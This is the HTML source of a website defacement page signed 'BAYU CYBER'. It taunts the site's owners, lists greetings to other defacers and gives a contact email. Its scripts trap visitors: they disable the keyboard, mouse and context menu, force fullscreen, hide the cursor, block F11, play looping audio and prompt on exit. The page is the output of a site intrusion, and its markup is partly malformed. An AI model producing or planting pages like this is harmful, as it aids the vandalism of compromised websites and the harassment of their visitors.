
<html>

  <head>
    <title>HACKED BY BAYU SIGMA</title>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/png" href="https://files.catbox.moe/2l6s3h.jpg">
    <meta http-equiv="X-UA-Compatible" content="IE=edge"><script type="text/javascript"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="title" content="Hacked by BAYU CYBER">
    <meta name="description" content="wh00pz ! your security get down">
    <meta name="keywords" content="hacked,deface,wordpress,website,whitehat,blackhat,defacer,hack,mirror">
    <meta name="robots" content="index, follow">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="language" content="English">
    <meta name="revisit-after" content="60 days">
    <meta name="author" content="BayuAnonymous">
    <meta property="og:image" content="https://files.catbox.moe/lmyg8v.jpg">
    <meta name="theme-color" content="#000">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
    <style type='text/css'>
      body,
      a:hover {
        cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;
      }
    </style>
    <link rel="stylesheet" href="https://wa.me/6288228819127">
  </head>
  <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
    <style type="text/css">
      center {
        font-family: Courier;
      }

      img {
        opacity: 80%;
      }

      red {
        color: white;
      }

      body {
    background: url("https://files.catbox.moe/kayyuu.jpg") no-repeat center center fixed;
    background-size: cover;
    margin: 0;
    padding: 0;
  }

      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }

      div {
        animation: glitch 1s linear infinite;
      }

      @keyframes glitch {

        2%,
        64% {
          transform: translate(2px, 0) skew(0deg);
        }

        4%,
        60% {
          transform: translate(-2px, 0) skew(0deg);
        }

        62% {
          transform: translate(0, 0) skew(5deg);
        }
      }

      div:before,
      div:after {
        content: attr(title);
        position: absolute;
        left: 0;
      }

      div:before {
        animation: glitchTop 1s linear infinite;
        clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
      }

      @keyframes glitchTop {

        2%,
        64% {
          transform: translate(2px, -2px);
        }

        4%,
        60% {
          transform: translate(-2px, 2px);
        }

        62% {
          transform: translate(13px, -1px) skew(-13deg);
        }
      }

      div:after {
        animation: glitchBotom 1.5s linear infinite;
        clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
      }

      @keyframes glitchBotom {

        2%,
        64% {
          transform: translate(-2px, 0);
        }

        4%,
        60% {
          transform: translate(-2px, 0);
        }

        62% {
          transform: translate(-22px, 5px) skew(21deg);
        }
      }
    </style>
    <script language="JavaScript">
      window.onbeforeunload = confirmExit;

      function confirmExit() {
        return "are you sure ? wkwk";
      }

      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
    </script>
<script id="rendered-js">
document.addEventListener('DOMContentLoaded', function (event) {
  // array with texts to type in typewriter
  var dataText = ["Wh00pz ! your security get down !", "Patch it now, loser !"];

  // type one text in the typwriter
  // keeps calling itself until the text is finished
  function typeWriter(text, i, fnCallback) {
    // chekc if text isn't finished yet
    if (i < text.length) {
      // add next character to h1

      document.getElementById("hekerabies").innerHTML = text.substring(0, i + 1);

      // wait for a while and call this function again for next character
      setTimeout(function () {
        typeWriter(text, i + 1, fnCallback);
      }, 150);
    }
    // text finished, call callback if there is a callback function
    else if (typeof fnCallback == 'function') {
        // call callback after timeout
        setTimeout(fnCallback, 7000);
      }
  }
  // start a typewriter animation for a text in the dataText array
  function StartTextAnimation(i) {
    if (typeof dataText[i] == 'undefined') {
      setTimeout(function () {
        StartTextAnimation(0);
      }, 10);
    }
    // check if dataText[i] exists
    if (i < dataText[i].length) {
      // text exists! start typewriter animation
      typeWriter(dataText[i], 0, function () {
        // after callback (and whole text has been animated), start next text
        StartTextAnimation(i + 1);
      });
    }
  }
  // start the text animation
  StartTextAnimation(0);
});
//# sourceURL=pen.js
    </script>
    <audio src="https://github.com/anonseven/heker/raw/main/v3/dark.mp3" autoplay="true" id="lagu" loop=""></audio>
    
      <source src="https://github.com/anonseven/heker/raw/main/v2/videoplayback.webm" type="video/webm">
    </video>
    <table width="100%" height="80%">
      <td>
        <center>
            <H4>Bayu Anonymous</H4>
          <small>BayuAnonymous 404 | Traser Official</small>
          <br>
          <img src="https://files.catbox.moe/4pxs0u.jpg" width="220" height="220" loading="lazy" onerror="this.style.display = 'none'">
          <br>Hacked by <red><i>BAYU CYBER</i></red><br>
          <font size="2" id="hekerabies"></font><br><br>
          <small>
            <font size="1" color="gray">yanganteng@protonmail.com</font>
          </small>
          <h5>oh iya keadilan hanya di tangan rakyat yang berduit saja hehe. no money no justic <hr> duduk sama rata berdiri tanpa raja</h5>
          </div>
          <div class="footer-greetings">
            <marquee>
              <font size="2">
                <b>Greetz</b> : Type-0 - Mr.BAYU OFFICIAL - BAYU CYBER - Hacked By BAYU 404 - BAYU CRASHER - Traser official
              </font>
            </marquee>
          </div>
      </td>
    </table>